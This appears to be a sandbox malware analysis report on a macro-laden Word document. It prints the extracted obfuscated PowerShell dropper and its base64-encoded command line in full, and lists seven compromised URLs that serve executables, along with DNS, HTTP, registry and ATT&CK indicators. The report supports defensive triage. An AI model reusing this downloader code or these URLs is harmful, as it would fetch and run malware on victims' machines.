c324a40e890a6801232b6e9e315729e8407f18114a08a99549f78e8bf8382c22

Analysis

max time kernel
119s
max time network
119s
platform
windows7_x64
resource
win7-20240903-en
resource tags

arch:x64arch:x86image:win7-20240903-enlocale:en-usos:windows7-x64system
submitted
28/09/2024, 01:12 UTC

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

fb3a9e3a017ea8828862c0e7e19dfbd1_JaffaCakes118.doc
Size

150KB
MD5

fb3a9e3a017ea8828862c0e7e19dfbd1
SHA1

50981141c50ed8ffefebf6f23f175642209d34fe
SHA256

c324a40e890a6801232b6e9e315729e8407f18114a08a99549f78e8bf8382c22
SHA512

8e674de4ba51d5f631bcb337ddc420b9e6a233cb001986caa3f03eebadce864b13a76ee3c1cf2eff02db02eaa4f9ec47a8e74a9e94970282dea0328319e54177
SSDEEP

1536:TJVnK90GM9xuXFEr4Zx50zkGcclJvahtqAGHXiNL0CMdfFB6Om:TfCMbu1Ty+crSmXiNBUfFB6Om

Score

10^/10

discovery

Malware Config

Extracted

Language

ps1

Source

1
$Veosnae=(('Re'+'w')+('aq'+'cw'));.('ne'+'w'+'-item') $eNv:USeRPRoFilE\Re0QeuY\AUHjV93\ -itemtype dIreCtoRy;[Net.ServicePointManager]::"Se`c`Ur`ITYPR`otoCol" = (('tl'+'s1'+'2,')+(' t'+'ls')+('11'+',')+(' '+'tl')+'s');$Nkkey3r = (('Uu'+'p')+('1u'+'0'));$Udr8si2=('Os'+('8lt'+'n_'));$J249bq_=$env:userprofile+(('A'+('dr'+'R')+('e0qeuy'+'AdrAuhjv9'+'3'+'Ad')+'r')."rE`pL`ACe"(([char]65+[char]100+[char]114),[STriNG][char]92))+$Nkkey3r+('.'+('e'+'xe'));$R_q4a0y=(('Y'+'0b')+'r'+('a'+'tc'));$Xiu3if0=.('n'+'ew-o'+'bject') net.WEBcLiENt;$Yx7ek2h=(('h'+'tt'+'p://j')+('ub'+'il'+'an'+'tenterp'+'rise.co'+'m'+'/wp-admin'+'/')+'M'+'j/'+'*h'+('tt'+'p://bryce'+'br'+'um')+'l'+'e'+('y.c'+'om/wp-'+'a')+('dmin/'+'lj/')+('*htt'+'p:/')+('/a'+'p')+('re'+'ndien')+('d'+'oga')+('nas'+'dig')+('it'+'al'+'.com/wp'+'-')+('admin/'+'r')+('/'+'*ht')+('tp:/'+'/mym')+'or'+('ni'+'nglov')+('e'+'.c')+'o'+('m/w'+'p-'+'admin')+('/acv'+'/*h')+'tt'+('p'+'://s'+'hi')+'va'+('m'+'-a')+('ggar'+'w')+'a'+('l'+'.c')+('om/cgi-'+'b'+'in'+'/')+'Z'+'r/'+'*'+('ht'+'t'+'ps://orig')+('i'+'na'+'lsal')+('on'+'qata')+'r.'+('c'+'om/wp-'+'adm')+'i'+('n/'+'lS0'+'/*')+'ht'+'tp'+('://aig'+'tr'+'ey')+('as'+'.')+('c'+'om/')+('wp-con'+'ten'+'t'+'/p/'))."s`PLiT"([char]42);$W5vo8ex=('Y0'+('bsu'+'3c'));foreach($Xi8d5to in $Yx7ek2h){try{$Xiu3if0."dOwnl`OA`DFile"($Xi8d5to, $J249bq_);$Uv22egl=('Lv'+('0tg'+'jg'));If ((.('Ge'+'t-Item') $J249bq_)."le`Ngth" -ge 20778) {.('Invok'+'e-It'+'em')($J249bq_);$Cqz3vdu=(('F6'+'b'+'8fm')+'h');break;$Gzp3lzz=('T'+('0lfec'+'y'))}}catch{}}$Abrln_i=('Eo'+'8'+('lj'+'9k'))

URLs

exe.dropper

http://jubilantenterprise.com/wp-admin/Mj/

exe.dropper

http://brycebrumley.com/wp-admin/lj/

exe.dropper

http://aprendiendoganasdigital.com/wp-admin/r/

exe.dropper

http://mymorninglove.com/wp-admin/acv/

exe.dropper

http://shivam-aggarwal.com/cgi-bin/Zr/

exe.dropper

https://originalsalonqatar.com/wp-admin/lS0/

exe.dropper

http://aigtreyas.com/wp-content/p/

Signatures

Process spawned unexpected child process 1 IoCs

This typically indicates the parent process was compromised via an exploit or macro.

description	pid	pid_target	Process	procid_target
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	2736	2540	POwersheLL.exe	31

Blocklisted process makes network request 1 IoCs

flow	pid	Process
9	2736	POwersheLL.exe

Drops file in Windows directory 1 IoCs

description	ioc	Process
File opened for modification	C:\Windows\Debug\WIA\wiatrace.log	WINWORD.EXE

System Location Discovery: System Language Discovery 1 TTPs 1 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

discovery

System Language Discovery

T1614.001

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	WINWORD.EXE

Office loads VBA resources, possible macro or embedded object present

Modifies registry class 64 IoCs

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-21-3290804112-2823094203-3137964600-1000_CLASSES\Interface\{8BD21D32-EC42-11CE-9E0D-00AA006002F3}	WINWORD.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-3290804112-2823094203-3137964600-1000_CLASSES\Interface\{5B9D8FC8-4A71-101B-97A6-00000B65C08B}\ = "FormEvents"	WINWORD.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-3290804112-2823094203-3137964600-1000_CLASSES\Wow6432Node\Interface\{04598FC3-866C-11CF-AB7C-00AA00C08FCF}\ = "IScrollbar"	WINWORD.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-3290804112-2823094203-3137964600-1000_CLASSES\Wow6432Node\Interface\{5512D115-5CC6-11CF-8D67-00AA00BDCE1D}\ = "IWHTMLReset"	WINWORD.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-3290804112-2823094203-3137964600-1000_CLASSES\Wow6432Node\Interface\{47FF8FE4-6198-11CF-8CE8-00AA006CB389}\ = "WHTMLControlEvents5"	WINWORD.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-3290804112-2823094203-3137964600-1000_CLASSES\TypeLib\{3B563710-014A-4413-88A3-CD91F8A27A86}\2.0\0\win32\ = "C:\\Users\\Admin\\AppData\\Local\\Temp\\VBE\\MSForms.exd"	WINWORD.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-3290804112-2823094203-3137964600-1000_CLASSES\Interface\{8BD21D13-EC42-11CE-9E0D-00AA006002F3}\ = "IMdcText"	WINWORD.EXE
Key created	\REGISTRY\USER\S-1-5-21-3290804112-2823094203-3137964600-1000_CLASSES\Interface\{04598FC2-866C-11CF-AB7C-00AA00C08FCF}	WINWORD.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-3290804112-2823094203-3137964600-1000_CLASSES\Interface\{92E11A03-7358-11CE-80CB-00AA00611080}\ = "Pages"	WINWORD.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\TypeLib\{3B563710-014A-4413-88A3-CD91F8A27A86}\2.0\0\win32\ = "C:\\Users\\Admin\\AppData\\Local\\Temp\\VBE\\MSForms.exd"	WINWORD.EXE
Key created	\REGISTRY\USER\S-1-5-21-3290804112-2823094203-3137964600-1000_CLASSES\Wow6432Node\Interface\{5512D113-5CC6-11CF-8D67-00AA00BDCE1D}	WINWORD.EXE
Key created	\REGISTRY\USER\S-1-5-21-3290804112-2823094203-3137964600-1000_CLASSES\Wow6432Node\Interface\{7B020EC7-AF6C-11CE-9F46-00AA00574A4F}	WINWORD.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-3290804112-2823094203-3137964600-1000_CLASSES\Interface\{04598FC9-866C-11CF-AB7C-00AA00C08FCF}\ = "IMultiPage"	WINWORD.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-3290804112-2823094203-3137964600-1000_CLASSES\Wow6432Node\Interface\{79176FB3-B7F2-11CE-97EF-00AA006D2776}\ = "ISpinbutton"	WINWORD.EXE
Key created	\REGISTRY\USER\S-1-5-21-3290804112-2823094203-3137964600-1000_CLASSES\Interface\{CF3F94A0-F546-11CE-9BCE-00AA00608E01}	WINWORD.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-3290804112-2823094203-3137964600-1000_CLASSES\Interface\{47FF8FE4-6198-11CF-8CE8-00AA006CB389}\ = "WHTMLControlEvents5"	WINWORD.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-3290804112-2823094203-3137964600-1000_CLASSES\Interface\{29B86A70-F52E-11CE-9BCE-00AA00608E01}\ = "IOptionFrame"	WINWORD.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-3290804112-2823094203-3137964600-1000_CLASSES\Wow6432Node\Interface\{8BD21D62-EC42-11CE-9E0D-00AA006002F3}\ = "MdcToggleButtonEvents"	WINWORD.EXE
Key created	\REGISTRY\USER\S-1-5-21-3290804112-2823094203-3137964600-1000_CLASSES\Wow6432Node\Interface\{8BD21D53-EC42-11CE-9E0D-00AA006002F3}	WINWORD.EXE
Key created	\REGISTRY\USER\S-1-5-21-3290804112-2823094203-3137964600-1000_CLASSES\Interface\{79176FB3-B7F2-11CE-97EF-00AA006D2776}	WINWORD.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-3290804112-2823094203-3137964600-1000_CLASSES\Interface\{7B020EC8-AF6C-11CE-9F46-00AA00574A4F}\ = "MultiPageEvents"	WINWORD.EXE
Key created	\REGISTRY\USER\S-1-5-21-3290804112-2823094203-3137964600-1000_CLASSES\Wow6432Node\Interface\{CF3F94A0-F546-11CE-9BCE-00AA00608E01}	WINWORD.EXE
Key created	\REGISTRY\USER\S-1-5-21-3290804112-2823094203-3137964600-1000_CLASSES\Interface\{47FF8FE0-6198-11CF-8CE8-00AA006CB389}	WINWORD.EXE
Key created	\REGISTRY\USER\S-1-5-21-3290804112-2823094203-3137964600-1000_CLASSES\Wow6432Node\Interface\{8BD21D13-EC42-11CE-9E0D-00AA006002F3}	WINWORD.EXE
Key created	\REGISTRY\USER\S-1-5-21-3290804112-2823094203-3137964600-1000_CLASSES\Wow6432Node\Interface\{8BD21D23-EC42-11CE-9E0D-00AA006002F3}	WINWORD.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-3290804112-2823094203-3137964600-1000_CLASSES\Wow6432Node\Interface\{04598FC2-866C-11CF-AB7C-00AA00C08FCF}\ = "ITabStrip"	WINWORD.EXE
Key created	\REGISTRY\USER\S-1-5-21-3290804112-2823094203-3137964600-1000_CLASSES\Interface\{5512D123-5CC6-11CF-8D67-00AA00BDCE1D}	WINWORD.EXE
Key created	\REGISTRY\USER\S-1-5-21-3290804112-2823094203-3137964600-1000_CLASSES\Wow6432Node\Interface\{47FF8FE0-6198-11CF-8CE8-00AA006CB389}	WINWORD.EXE
Key created	\REGISTRY\USER\S-1-5-21-3290804112-2823094203-3137964600-1000_CLASSES\Wow6432Node\Interface\{82B02370-B5BC-11CF-810F-00A0C9030074}	WINWORD.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-3290804112-2823094203-3137964600-1000_CLASSES\Interface\{82B02371-B5BC-11CF-810F-00A0C9030074}\ = "IReturnBoolean"	WINWORD.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-3290804112-2823094203-3137964600-1000_CLASSES\Interface\{04598FC2-866C-11CF-AB7C-00AA00C08FCF}\ = "ITabStrip"	WINWORD.EXE
Key created	\REGISTRY\USER\S-1-5-21-3290804112-2823094203-3137964600-1000_CLASSES\Interface\{5512D119-5CC6-11CF-8D67-00AA00BDCE1D}	WINWORD.EXE
Key created	\REGISTRY\USER\S-1-5-21-3290804112-2823094203-3137964600-1000_CLASSES\Interface\{5512D11D-5CC6-11CF-8D67-00AA00BDCE1D}	WINWORD.EXE
Key created	\REGISTRY\USER\S-1-5-21-3290804112-2823094203-3137964600-1000_CLASSES\Interface\{978C9E22-D4B0-11CE-BF2D-00AA003F40D0}	WINWORD.EXE
Key created	\REGISTRY\USER\S-1-5-21-3290804112-2823094203-3137964600-1000_CLASSES\Wow6432Node\Interface\{7B020EC2-AF6C-11CE-9F46-00AA00574A4F}	WINWORD.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-3290804112-2823094203-3137964600-1000_CLASSES\Wow6432Node\Interface\{47FF8FE3-6198-11CF-8CE8-00AA006CB389}\ = "WHTMLControlEvents4"	WINWORD.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-3290804112-2823094203-3137964600-1000_CLASSES\Wow6432Node\Interface\{BEF6E003-A874-101A-8BBA-00AA00300CAB}\ = "Font"	WINWORD.EXE
Key created	\REGISTRY\USER\S-1-5-21-3290804112-2823094203-3137964600-1000_CLASSES\Interface\{47FF8FE6-6198-11CF-8CE8-00AA006CB389}	WINWORD.EXE
Key created	\REGISTRY\USER\S-1-5-21-3290804112-2823094203-3137964600-1000_CLASSES\Wow6432Node\Interface\{47FF8FE6-6198-11CF-8CE8-00AA006CB389}	WINWORD.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-3290804112-2823094203-3137964600-1000_CLASSES\Interface\{79176FB3-B7F2-11CE-97EF-00AA006D2776}\ = "ISpinbutton"	WINWORD.EXE
Key created	\REGISTRY\USER\S-1-5-21-3290804112-2823094203-3137964600-1000_CLASSES\Wow6432Node\Interface\{5512D117-5CC6-11CF-8D67-00AA00BDCE1D}	WINWORD.EXE
Key created	\REGISTRY\USER\S-1-5-21-3290804112-2823094203-3137964600-1000_CLASSES\Interface\{7B020EC1-AF6C-11CE-9F46-00AA00574A4F}	WINWORD.EXE
Key created	\REGISTRY\USER\S-1-5-21-3290804112-2823094203-3137964600-1000_CLASSES\Wow6432Node\Interface\{47FF8FE1-6198-11CF-8CE8-00AA006CB389}	WINWORD.EXE
Key created	\REGISTRY\USER\S-1-5-21-3290804112-2823094203-3137964600-1000_CLASSES\Wow6432Node\Interface\{82B02372-B5BC-11CF-810F-00A0C9030074}	WINWORD.EXE
Key created	\REGISTRY\USER\S-1-5-21-3290804112-2823094203-3137964600-1000_CLASSES\Wow6432Node\Interface\{EC72F590-F375-11CE-B9E8-00AA006B1A69}	WINWORD.EXE
Key created	\REGISTRY\USER\S-1-5-21-3290804112-2823094203-3137964600-1000_CLASSES\Interface\{04598FC7-866C-11CF-AB7C-00AA00C08FCF}	WINWORD.EXE
Key created	\REGISTRY\USER\S-1-5-21-3290804112-2823094203-3137964600-1000_CLASSES\Wow6432Node\Interface\{9A4BBF53-4E46-101B-8BBD-00AA003E3B29}	WINWORD.EXE
Key created	\REGISTRY\USER\S-1-5-21-3290804112-2823094203-3137964600-1000_CLASSES\Interface\{8BD21D53-EC42-11CE-9E0D-00AA006002F3}	WINWORD.EXE
Key created	\REGISTRY\USER\S-1-5-21-3290804112-2823094203-3137964600-1000_CLASSES\Interface\{47FF8FE2-6198-11CF-8CE8-00AA006CB389}	WINWORD.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\TypeLib\{3B563710-014A-4413-88A3-CD91F8A27A86}\2.0\HELPDIR\ = "C:\\Users\\Admin\\AppData\\Local\\Temp\\VBE"	WINWORD.EXE
Key created	\REGISTRY\USER\S-1-5-21-3290804112-2823094203-3137964600-1000_CLASSES\Wow6432Node\Interface\{04598FC8-866C-11CF-AB7C-00AA00C08FCF}	WINWORD.EXE
Key created	\REGISTRY\USER\S-1-5-21-3290804112-2823094203-3137964600-1000_CLASSES\Interface\{5512D11B-5CC6-11CF-8D67-00AA00BDCE1D}	WINWORD.EXE
Key created	\REGISTRY\USER\S-1-5-21-3290804112-2823094203-3137964600-1000_CLASSES\Wow6432Node\Interface\{47FF8FE8-6198-11CF-8CE8-00AA006CB389}	WINWORD.EXE
Key created	\REGISTRY\USER\S-1-5-21-3290804112-2823094203-3137964600-1000_CLASSES\Wow6432Node\Interface\{82B02371-B5BC-11CF-810F-00A0C9030074}	WINWORD.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-3290804112-2823094203-3137964600-1000_CLASSES\Wow6432Node\Interface\{944ACF93-A1E6-11CE-8104-00AA00611080}\ = "Tabs"	WINWORD.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-3290804112-2823094203-3137964600-1000_CLASSES\Interface\{5512D117-5CC6-11CF-8D67-00AA00BDCE1D}\ = "IWHTMLCheckbox"	WINWORD.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-3290804112-2823094203-3137964600-1000_CLASSES\Interface\{5512D11B-5CC6-11CF-8D67-00AA00BDCE1D}\ = "IWHTMLText"	WINWORD.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-3290804112-2823094203-3137964600-1000_CLASSES\Wow6432Node\Interface\{7B020EC1-AF6C-11CE-9F46-00AA00574A4F}\ = "CommandButtonEvents"	WINWORD.EXE
Key created	\REGISTRY\USER\S-1-5-21-3290804112-2823094203-3137964600-1000_CLASSES\Wow6432Node\Interface\{04598FC3-866C-11CF-AB7C-00AA00C08FCF}	WINWORD.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-3290804112-2823094203-3137964600-1000_CLASSES\Interface\{8BD21D63-EC42-11CE-9E0D-00AA006002F3}\ = "IMdcToggleButton"	WINWORD.EXE
Key created	\REGISTRY\USER\S-1-5-21-3290804112-2823094203-3137964600-1000_CLASSES\Wow6432Node\Interface\{5512D111-5CC6-11CF-8D67-00AA00BDCE1D}	WINWORD.EXE
Key created	\REGISTRY\USER\S-1-5-21-3290804112-2823094203-3137964600-1000_CLASSES\Wow6432Node\Interface\{5512D125-5CC6-11CF-8D67-00AA00BDCE1D}	WINWORD.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-3290804112-2823094203-3137964600-1000_CLASSES\Wow6432Node\Interface\{47FF8FE2-6198-11CF-8CE8-00AA006CB389}\ = "WHTMLControlEvents3"	WINWORD.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-3290804112-2823094203-3137964600-1000_CLASSES\Wow6432Node\Interface\{47FF8FE8-6198-11CF-8CE8-00AA006CB389}\ = "WHTMLControlEvents9"	WINWORD.EXE

Suspicious behavior: AddClipboardFormatListener 1 IoCs

pid	Process
1980	WINWORD.EXE

Suspicious behavior: EnumeratesProcesses 1 IoCs

pid	Process
2736	POwersheLL.exe

Suspicious use of AdjustPrivilegeToken 1 IoCs

description	pid	Process
Token: SeDebugPrivilege	2736	POwersheLL.exe

Suspicious use of SetWindowsHookEx 2 IoCs

pid	Process
1980	WINWORD.EXE
1980	WINWORD.EXE

Suspicious use of WriteProcessMemory 4 IoCs

description	pid	Process	procid_target
PID 1980 wrote to memory of 568	1980	WINWORD.EXE	35
PID 1980 wrote to memory of 568	1980	WINWORD.EXE	35
PID 1980 wrote to memory of 568	1980	WINWORD.EXE	35
PID 1980 wrote to memory of 568	1980	WINWORD.EXE	35

C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE
"C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\fb3a9e3a017ea8828862c0e7e19dfbd1_JaffaCakes118.doc"
1⤵
- Drops file in Windows directory
- System Location Discovery: System Language Discovery
- Modifies registry class
- Suspicious behavior: AddClipboardFormatListener
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:1980
- C:\Windows\splwow64.exe
  C:\Windows\splwow64.exe 12288
  2⤵
  PID:568

C:\Windows\System32\WindowsPowerShell\v1.0\POwersheLL.exe
POwersheLL -ENCOD JABWAGUAbwBzAG4AYQBlAD0AKAAoACcAUgBlACcAKwAnAHcAJwApACsAKAAnAGEAcQAnACsAJwBjAHcAJwApACkAOwAuACgAJwBuAGUAJwArACcAdwAnACsAJwAtAGkAdABlAG0AJwApACAAJABlAE4AdgA6AFUAUwBlAFIAUABSAG8ARgBpAGwARQBcAFIAZQAwAFEAZQB1AFkAXABBAFUASABqAFYAOQAzAFwAIAAtAGkAdABlAG0AdAB5AHAAZQAgAGQASQByAGUAQwB0AG8AUgB5ADsAWwBOAGUAdAAuAFMAZQByAHYAaQBjAGUAUABvAGkAbgB0AE0AYQBuAGEAZwBlAHIAXQA6ADoAIgBTAGUAYABjAGAAVQByAGAASQBUAFkAUABSAGAAbwB0AG8AQwBvAGwAIgAgAD0AIAAoACgAJwB0AGwAJwArACcAcwAxACcAKwAnADIALAAnACkAKwAoACcAIAB0ACcAKwAnAGwAcwAnACkAKwAoACcAMQAxACcAKwAnACwAJwApACsAKAAnACAAJwArACcAdABsACcAKQArACcAcwAnACkAOwAkAE4AawBrAGUAeQAzAHIAIAA9ACAAKAAoACcAVQB1ACcAKwAnAHAAJwApACsAKAAnADEAdQAnACsAJwAwACcAKQApADsAJABVAGQAcgA4AHMAaQAyAD0AKAAnAE8AcwAnACsAKAAnADgAbAB0ACcAKwAnAG4AXwAnACkAKQA7ACQASgAyADQAOQBiAHEAXwA9ACQAZQBuAHYAOgB1AHMAZQByAHAAcgBvAGYAaQBsAGUAKwAoACgAJwBBACcAKwAoACcAZAByACcAKwAnAFIAJwApACsAKAAnAGUAMABxAGUAdQB5ACcAKwAnAEEAZAByAEEAdQBoAGoAdgA5ACcAKwAnADMAJwArACcAQQBkACcAKQArACcAcgAnACkALgAiAHIARQBgAHAATABgAEEAQwBlACIAKAAoAFsAYwBoAGEAcgBdADYANQArAFsAYwBoAGEAcgBdADEAMAAwACsAWwBjAGgAYQByAF0AMQAxADQAKQAsAFsAUwBUAHIAaQBOAEcAXQBbAGMAaABhAHIAXQA5ADIAKQApACsAJABOAGsAawBlAHkAMwByACsAKAAnAC4AJwArACgAJwBlACcAKwAnAHgAZQAnACkAKQA7ACQAUgBfAHEANABhADAAeQA9ACgAKAAnAFkAJwArACcAMABiACcAKQArACcAcgAnACsAKAAnAGEAJwArACcAdABjACcAKQApADsAJABYAGkAdQAzAGkAZgAwAD0ALgAoACcAbgAnACsAJwBlAHcALQBvACcAKwAnAGIAagBlAGMAdAAnACkAIABuAGUAdAAuAFcARQBCAGMATABpAEUATgB0ADsAJABZAHgANwBlAGsAMgBoAD0AKAAoACcAaAAnACsAJwB0AHQAJwArACcAcAA6AC8ALwBqACcAKQArACgAJwB1AGIAJwArACcAaQBsACcAKwAnAGEAbgAnACsAJwB0AGUAbgB0AGUAcgBwACcAKwAnAHIAaQBzAGUALgBjAG8AJwArACcAbQAnACsAJwAvAHcAcAAtAGEAZABtAGkAbgAnACsAJwAvACcAKQArACcATQAnACsAJwBqAC8AJwArACcAKgBoACcAKwAoACcAdAB0ACcAKwAnAHAAOgAvAC8AYgByAHkAYwBlACcAKwAnAGIAcgAnACsAJwB1AG0AJwApACsAJwBsACcAKwAnAGUAJwArACgAJwB5AC4AYwAnACsAJwBvAG0ALwB3AHAALQAnACsAJwBhACcAKQArACgAJwBkAG0AaQBuAC8AJwArACcAbABqAC8AJwApACsAKAAnACoAaAB0AHQAJwArACcAcAA6AC8AJwApACsAKAAnAC8AYQAnACsAJwBwACcAKQArACgAJwByAGUAJwArACcAbgBkAGkAZQBuACcAKQArACgAJwBkACcAKwAnAG8AZwBhACcAKQArACgAJwBuAGEAcwAnACsAJwBkAGkAZwAnACkAKwAoACcAaQB0ACcAKwAnAGEAbAAnACsAJwAuAGMAbwBtAC8AdwBwACcAKwAnAC0AJwApACsAKAAnAGEAZABtAGkAbgAvACcAKwAnAHIAJwApACsAKAAnAC8AJwArACcAKgBoAHQAJwApACsAKAAnAHQAcAA6AC8AJwArACcALwBtAHkAbQAnACkAKwAnAG8AcgAnACsAKAAnAG4AaQAnACsAJwBuAGcAbABvAHYAJwApACsAKAAnAGUAJwArACcALgBjACcAKQArACcAbwAnACsAKAAnAG0ALwB3ACcAKwAnAHAALQAnACsAJwBhAGQAbQBpAG4AJwApACsAKAAnAC8AYQBjAHYAJwArACcALwAqAGgAJwApACsAJwB0AHQAJwArACgAJwBwACcAKwAnADoALwAvAHMAJwArACcAaABpACcAKQArACcAdgBhACcAKwAoACcAbQAnACsAJwAtAGEAJwApACsAKAAnAGcAZwBhAHIAJwArACcAdwAnACkAKwAnAGEAJwArACgAJwBsACcAKwAnAC4AYwAnACkAKwAoACcAbwBtAC8AYwBnAGkALQAnACsAJwBiACcAKwAnAGkAbgAnACsAJwAvACcAKQArACcAWgAnACsAJwByAC8AJwArACcAKgAnACsAKAAnAGgAdAAnACsAJwB0ACcAKwAnAHAAcwA6AC8ALwBvAHIAaQBnACcAKQArACgAJwBpACcAKwAnAG4AYQAnACsAJwBsAHMAYQBsACcAKQArACgAJwBvAG4AJwArACcAcQBhAHQAYQAnACkAKwAnAHIALgAnACsAKAAnAGMAJwArACcAbwBtAC8AdwBwAC0AJwArACcAYQBkAG0AJwApACsAJwBpACcAKwAoACcAbgAvACcAKwAnAGwAUwAwACcAKwAnAC8AKgAnACkAKwAnAGgAdAAnACsAJwB0AHAAJwArACgAJwA6AC8ALwBhAGkAZwAnACsAJwB0AHIAJwArACcAZQB5ACcAKQArACgAJwBhAHMAJwArACcALgAnACkAKwAoACcAYwAnACsAJwBvAG0ALwAnACkAKwAoACcAdwBwAC0AYwBvAG4AJwArACcAdABlAG4AJwArACcAdAAnACsAJwAvAHAALwAnACkAKQAuACIAcwBgAFAATABpAFQAIgAoAFsAYwBoAGEAcgBdADQAMgApADsAJABXADUAdgBvADgAZQB4AD0AKAAnAFkAMAAnACsAKAAnAGIAcwB1ACcAKwAnADMAYwAnACkAKQA7AGYAbwByAGUAYQBjAGgAKAAkAFgAaQA4AGQANQB0AG8AIABpAG4AIAAkAFkAeAA3AGUAawAyAGgAKQB7AHQAcgB5AHsAJABYAGkAdQAzAGkAZgAwAC4AIgBkAE8AdwBuAGwAYABPAEEAYABEAEYAaQBsAGUAIgAoACQAWABpADgAZAA1AHQAbwAsACAAJABKADIANAA5AGIAcQBfACkAOwAkAFUAdgAyADIAZQBnAGwAPQAoACcATAB2ACcAKwAoACcAMAB0AGcAJwArACcAagBnACcAKQApADsASQBmACAAKAAoAC4AKAAnAEcAZQAnACsAJwB0AC0ASQB0AGUAbQAnACkAIAAkAEoAMgA0ADkAYgBxAF8AKQAuACIAbABlAGAATgBnAHQAaAAiACAALQBnAGUAIAAyADAANwA3ADgAKQAgAHsALgAoACcASQBuAHYAbwBrACcAKwAnAGUALQBJAHQAJwArACcAZQBtACcAKQAoACQASgAyADQAOQBiAHEAXwApADsAJABDAHEAegAzAHYAZAB1AD0AKAAoACcARgA2ACcAKwAnAGIAJwArACcAOABmAG0AJwApACsAJwBoACcAKQA7AGIAcgBlAGEAawA7ACQARwB6AHAAMwBsAHoAegA9ACgAJwBUACcAKwAoACcAMABsAGYAZQBjACcAKwAnAHkAJwApACkAfQB9AGMAYQB0AGMAaAB7AH0AfQAkAEEAYgByAGwAbgBfAGkAPQAoACcARQBvACcAKwAnADgAJwArACgAJwBsAGoAJwArACcAOQBrACcAKQApAA==
1⤵
- Process spawned unexpected child process
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2736

Network

DNS

jubilantenterprise.com

POwersheLL.exe

Remote address:

8.8.8.8:53

Request

jubilantenterprise.com

IN A

Response
DNS

brycebrumley.com

POwersheLL.exe

Remote address:

8.8.8.8:53

Request

brycebrumley.com

IN A

Response
DNS

aprendiendoganasdigital.com

POwersheLL.exe

Remote address:

8.8.8.8:53

Request

aprendiendoganasdigital.com

IN A

Response
DNS

mymorninglove.com

POwersheLL.exe

Remote address:

8.8.8.8:53

Request

mymorninglove.com

IN A

Response
DNS

mymorninglove.com

POwersheLL.exe

Remote address:

8.8.8.8:53

Request

mymorninglove.com

IN A

Response
DNS

mymorninglove.com

POwersheLL.exe

Remote address:

8.8.8.8:53

Request

mymorninglove.com

IN A

Response
DNS

mymorninglove.com

POwersheLL.exe

Remote address:

8.8.8.8:53

Request

mymorninglove.com

IN A

Response
DNS

shivam-aggarwal.com

POwersheLL.exe

Remote address:

8.8.8.8:53

Request

shivam-aggarwal.com

IN A

Response

shivam-aggarwal.com

IN A

13.248.213.45

shivam-aggarwal.com

IN A

76.223.67.189
GET

http://shivam-aggarwal.com/cgi-bin/Zr/

POwersheLL.exe

Remote address:

13.248.213.45:80

Request

GET /cgi-bin/Zr/ HTTP/1.1
Host: shivam-aggarwal.com
Connection: Keep-Alive

Response

HTTP/1.1 200 OK

Server: openresty
Date: Sat, 28 Sep 2024 01:12:55 GMT
Content-Type: text/html
Content-Length: 114
Connection: keep-alive
DNS

originalsalonqatar.com

POwersheLL.exe

Remote address:

8.8.8.8:53

Request

originalsalonqatar.com

IN A

Response

13.248.213.45:80

http://shivam-aggarwal.com/cgi-bin/Zr/

http

POwersheLL.exe

264 B
391 B
4
3

HTTP Request

GET http://shivam-aggarwal.com/cgi-bin/Zr/

HTTP Response

200

8.8.8.8:53

jubilantenterprise.com

dns

POwersheLL.exe

68 B
68 B
1
1

DNS Request

jubilantenterprise.com
8.8.8.8:53

brycebrumley.com

dns

POwersheLL.exe

62 B
135 B
1
1

DNS Request

brycebrumley.com
8.8.8.8:53

aprendiendoganasdigital.com

dns

POwersheLL.exe

73 B
146 B
1
1

DNS Request

aprendiendoganasdigital.com
8.8.8.8:53

mymorninglove.com

dns

POwersheLL.exe

252 B
252 B
4
4

DNS Request

mymorninglove.com

DNS Request

mymorninglove.com

DNS Request

mymorninglove.com

DNS Request

mymorninglove.com
8.8.8.8:53

shivam-aggarwal.com

dns

POwersheLL.exe

65 B
97 B
1
1

DNS Request

shivam-aggarwal.com

DNS Response

13.248.213.45

76.223.67.189
8.8.8.8:53

originalsalonqatar.com

dns

POwersheLL.exe

68 B
141 B
1
1

DNS Request

originalsalonqatar.com

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

System Location Discovery

T1614

System Language Discovery

T1614.001

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

